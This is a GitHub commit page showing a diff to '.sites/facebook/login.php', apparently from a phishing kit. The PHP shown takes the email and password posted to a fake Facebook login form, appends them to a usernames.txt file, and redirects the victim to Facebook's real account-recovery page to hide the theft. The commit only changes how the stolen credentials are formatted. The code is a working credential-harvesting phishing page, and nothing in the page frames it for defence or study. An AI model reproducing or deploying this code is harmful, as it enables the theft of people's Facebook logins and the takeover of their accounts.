We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents e9b4c48 + 397f8a8 commit e159daeCopy full SHA for e159dae
.sites/facebook/login.php
@@ -1,5 +1,5 @@
1
<?php
2
-file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . "\nPassword: " . $_POST['pass'] ."\n", FILE_APPEND);
+file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . "Pass: " . $_POST['pass'] ."\n", FILE_APPEND);
3
header('Location: https://facebook.com/recover/initiate/');
4
exit();
5
-?>
+?>
0 commit comments